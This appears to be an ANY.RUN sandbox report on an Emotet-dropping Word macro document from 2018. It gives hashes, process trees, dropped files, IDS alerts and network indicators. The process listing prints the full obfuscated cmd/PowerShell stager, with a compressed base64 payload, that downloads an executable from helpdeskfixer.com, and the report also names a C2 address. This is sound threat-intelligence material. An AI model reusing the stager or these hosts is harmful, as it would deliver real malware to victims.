analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

112018

Full analysis: https://app.any.run/tasks/45d9036f-4fcf-4de7-bafc-034bf6c8d09d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 20:49:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Scarlett-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 16:04:00 2018, Last Saved Time/Date: Thu Nov 8 16:04:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

8FED20B845F68FF1D6475DAC4A68A5BC

SHA1:

B50E85B5012018E9DAC637E82B0ABFDB8B0DD9A9

SHA256:

C3116425326F96A0540EA890B1000EE3024992C213345C479FF7E4035E155596

SSDEEP:

768:DXirRkVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o94GY9erHihX51CLW:j4Rkocn1kp59gxBK85fBt+a9tjTiLI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2788)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2788)
    • Application was dropped or rewritten from another process

      • 673.exe (PID: 2704)
      • 673.exe (PID: 2016)
      • lpiograd.exe (PID: 3732)
      • lpiograd.exe (PID: 2156)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3212)
    • EMOTET was detected

      • lpiograd.exe (PID: 2156)
    • Emotet process was detected

      • lpiograd.exe (PID: 3732)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 2156)
    • Connects to CnC server

      • lpiograd.exe (PID: 2156)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 2152)
    • Creates files in the user directory

      • powershell.exe (PID: 3212)
    • Starts itself from another location

      • 673.exe (PID: 2016)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3212)
      • 673.exe (PID: 2016)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2788)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 16:04:00
CreateDate: 2018:11:08 16:04:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Scarlett-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 673.exe no specs 673.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2788"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\112018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2152CMD c:\wINDOWs\SySteM32\cMd.eXE /c"seT oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VBtWSzBjxX7hsQFB3D4CGwlOEgXhVb7GBXO6RkhBQidgi0zfgaDE3Ui5akujzs9/wey5sJLiivJtcK2JCl1lOSgCM07GfG0fiY1N5Ul++N2YlN3DwqwTFVJAdb0Z29uoXLLHZCnxiWXbCNWhzvtvceQMW4YFzm3tKF/35iFFz96eseYMjnYsTa8M5qKrOlEm8fXZfOO8KcW3A3QHA2jkKcyiAP0Nn1BUbi/LOMQZD1zcNIj9IVG/X6EMJwBRZkyQJNiEC42NuAy6OsZXp1prmFXI14rL4Wi6QcXcGMegl44jHayViWMd530NolY5ymjNqEuKa5t+ws=' ) , [SYstEm.Io.coMpResSioN.cOMPrEsSIONmOde]::deCOMprEsS) ^| % { NeW-ObjECT sYsTEM.iO.StReaMReaDeR( $_ ,[Text.EnCoDINg]::aSCiI )} ^|%{ $_.rEadtOEnD( ) })^|^&((get-VariABlE '*MDR*').nAME[3,11,2]-join'')&& POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( ^&( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3212POwErSheLL Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( &( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va','ablE:exECuti' )).\"vAL`UE\".\"InV`OKE`COMMA`Nd\".(\"{2}{0}{1}\"-f 'voKEsC','RIPT','IN' ).Invoke( ( ${z`lAh3g}::( \"{5}{0}{4}{3}{6}{2}{1}\" -f 'eT','LE','tVARIAb','e','eNvIrOnm','g','N' ).Invoke('oDB',(\"{1}{2}{0}\" -f 'Ss','Pro','CE' ))))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2704"C:\Users\admin\AppData\Local\Temp\673.exe" C:\Users\admin\AppData\Local\Temp\673.exepowershell.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
2016"C:\Users\admin\AppData\Local\Temp\673.exe"C:\Users\admin\AppData\Local\Temp\673.exe
673.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3732"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
673.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
2156"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Version:
1, 4, 2, 50
Total events
1 740
Read events
1 319
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
2788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA832.tmp.cvr
MD5:
SHA256:
3212powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KPEXR0HKI4868D1TM43K.temp
MD5:
SHA256:
3212powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db496.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3212powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2788WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\112018.doc.LNKlnk
MD5:E7DF12114CDDF6C41D3D34DE25C797D9
SHA256:982D0FB17D542818E2137145C79580317A6708DFC9309FAEC3047AAE7A5FE27F
2788WINWORD.EXEC:\Users\admin\Downloads\~$112018.docpgc
MD5:DF7602658A1543492EEF42E26D0ADE56
SHA256:04171D507AEB495D27960A87B9C052B32E550C9D52AF6B5EF4CEB018E9084CD3
2788WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B15D69155ECBF651AE2977622F2D94DA
SHA256:BA9CC9D573601F34BF3E4EEB8193D076BDE6B415D47717A41F55A6A836E72DEC
3212powershell.exeC:\Users\admin\AppData\Local\Temp\673.exeexecutable
MD5:A75D52EECA1B1EBCF1B81F2508512BD2
SHA256:F8000AAF823F1327F38052E8914B863794A44B8B2991667BD2066BC5E7A03F22
2016673.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:A75D52EECA1B1EBCF1B81F2508512BD2
SHA256:F8000AAF823F1327F38052E8914B863794A44B8B2991667BD2066BC5E7A03F22
2788WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:BCAAB2F015E60F4C38D3015875829D81
SHA256:6DF09BB63DBA9F0FFFEEC05562B1E9A1CAE8D82FD8F7D7A4ABCA9DCB32503FE6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3212
powershell.exe
GET
200
185.10.73.233:80
http://helpdeskfixer.com/kmvkWIp/
IR
executable
148 Kb
malicious
3212
powershell.exe
GET
301
185.10.73.233:80
http://helpdeskfixer.com/kmvkWIp
IR
html
241 b
malicious
2156
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2156
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
3212
powershell.exe
185.10.73.233:80
helpdeskfixer.com
Roshangar Rayaneh Tehran Co. Ltd.
IR
malicious

DNS requests

Domain
IP
Reputation
helpdeskfixer.com
  • 185.10.73.233
malicious

Threats

PID
Process
Class
Message
3212
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3212
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3212
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3212
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2156
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info